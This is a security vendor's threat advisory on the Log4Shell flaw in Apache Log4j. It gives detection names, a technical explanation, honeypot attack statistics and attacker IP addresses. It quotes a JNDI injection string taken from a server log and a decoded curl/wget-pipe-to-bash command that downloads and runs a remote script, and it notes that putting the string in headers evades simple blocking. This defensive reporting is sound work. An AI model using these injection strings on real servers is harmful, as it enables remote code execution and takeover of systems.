CVE-2021-44228 vulnerability in Apache Log4j library

Updated 2021-12-16

CVE-2021-44228 summary

Last week information security media reported the discovery of the critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). The threat, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If an attacker manages to exploit it on a vulnerable server, they gain the ability to execute arbitrary code and potentially take full control of the system. A publicly published Proof-of-Concept, as well as the vulnerability’s easy exploitability, make this situation particularly dangerous.
Kaspersky is aware of PoCs in the public domain and of the possible exploitation of CVE-2021-44228 by cybercriminals. Our products protect against attacks leveraging the vulnerability, including PoC usage. Possible detection names are:

  • UMIDS:Intrusion.Generic.CVE-2021-44228.*
  • PDM:Exploit.Win32.Generic

KATA verdicts:

  • Exploit.CVE-2021-44228.TCP.C&C
  • Exploit.CVE-2021-44228.HTTP.C&C
  • Exploit.CVE-2021-44228.UDP.C&C

Geography of CVE-2021-44228 scan and exploitation attempts, December 2021 (download)

CVE-2021-44228 technical details

The remote code execution vulnerability CVE-2021-44228 was found in the Apache Log4j library, a part of the Apache Logging Project. If a product uses a vulnerable version of this library with the JNDI module for logging purposes, there is a high possibility that this vulnerability can be exploited. Almost all versions of Log4j are vulnerable, from 2.0-beta9 to 2.14.1.
Log4j includes a Lookup mechanism that could be used to make requests through special syntax in a format string. For example, it can be used to request various parameters such as the version of the Java environment via ${java:version}, etc. Then, by specifying the jndi key in the string, the Lookup mechanism uses JNDI API. By default, all requests are done using the prefix java:comp/env/; however, the authors implemented the option of using a custom prefix by means of a colon symbol in the key. This is where the vulnerability lies: if jndi:ldap:// is used as the key, the request goes to the specified LDAP server. Other communication protocols, such as LDAPS, DNS and RMI, can also be used.

Kaspersky has been monitoring telemetry related to exploitation of CVE-2021-44228 vulnerability, successfully extracting the URLs used by the attackers. Noteworthy examples can be found below.

Analysis of the URLs showed how the attackers tried to insert the payload in uncommon fields, such as User-Agent, the data field, and the URI parameter. This is an example of an evasion technique aimed at bypassing simple blocking measures applied by many companies to protect against this kind of attacks.

The following excerpt shows an exploitation attempt as displayed in HTTP server logs.
45.155.205[.]233:53590 server:80 - [10/Dec/2021:13:25:10 +0000] "GET / HTTP/1.1" 200 1671 "-" "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/[BASE64-code-removed]}"

The base64 string in the request above decodes to:
(curl -s||wget -q -O-|bash
The code fetches a malicious script from and subsequently runs it using Bash.

Thus, an attacker-controlled remote server could return some object to a vulnerable server, potentially leading to arbitrary code execution in the system or to leakage of confidential data. All an attacker should do is send a special string through the mechanism that writes this string to a log file and is therefore handled by the Log4j library. This can be done with simple HTTP requests, for example, ones sent through web forms, data fields, etc, or with any other kind of interactions that use server-side logging.

CVE-2021-44228 exploitation statistics

Data originating from our honeypots shows a total of 8646 exploitation attempts between December 10th and December 12th, with peak activity occurring on December 11th at 12:00 GMT at an hourly rate of 1700 malicious requests.

log4j exploitation attempts per hour, December 10th through 12th

Below are the TOP 10 most active attacker IPs we have observed so far.

Source IP Country Total number of requests
147.182.131[.]229 USA 948
147.182.215[.]36 USA 789
137.184.28[.]58 USA 693
195.54.160[.]149 Russia 201
45.155.205[.]233 Germany 182
5.157.38[.]50 Sweden 134
46.105.95[.]220 France 108
131.100.148[.]7 Brazil 104
113.141.64[.]14 China 103
221.228.87[.]37 China 83

We observed malicious requests coming to our honeypots from across the globe, with the most requests being made from the countries in the table below.

Country Total number of requests
United States 1284
China 623
Germany 602
United Kingdom 497
Canada 477
Netherlands 476
Singapore 449
France 420
Australia 403
Japan 372

The systems most affected by mass scanning activity and attempts to leverage the exploit code were as follows.

ASN Total number of requests
M247 Ltd 1190
OOO Network of data-centers Selectel 833
Host Universal Pty Ltd 547
Gigabit Hosting Sdn Bhd 316
Hydra Communications Ltd 247
Event Zero 239
Intertelecom Ltd 196

Mitigations for CVE-2021-44228

Affected Kaspersky products

Supported Kaspersky products are not affected by the CVE-2021-44228 vulnerability.

Indicators of compromise (IOC)


This post appeared first on SecureList – Kaspersky Lab’s Cyberthreat Research and Reports
Author: AMR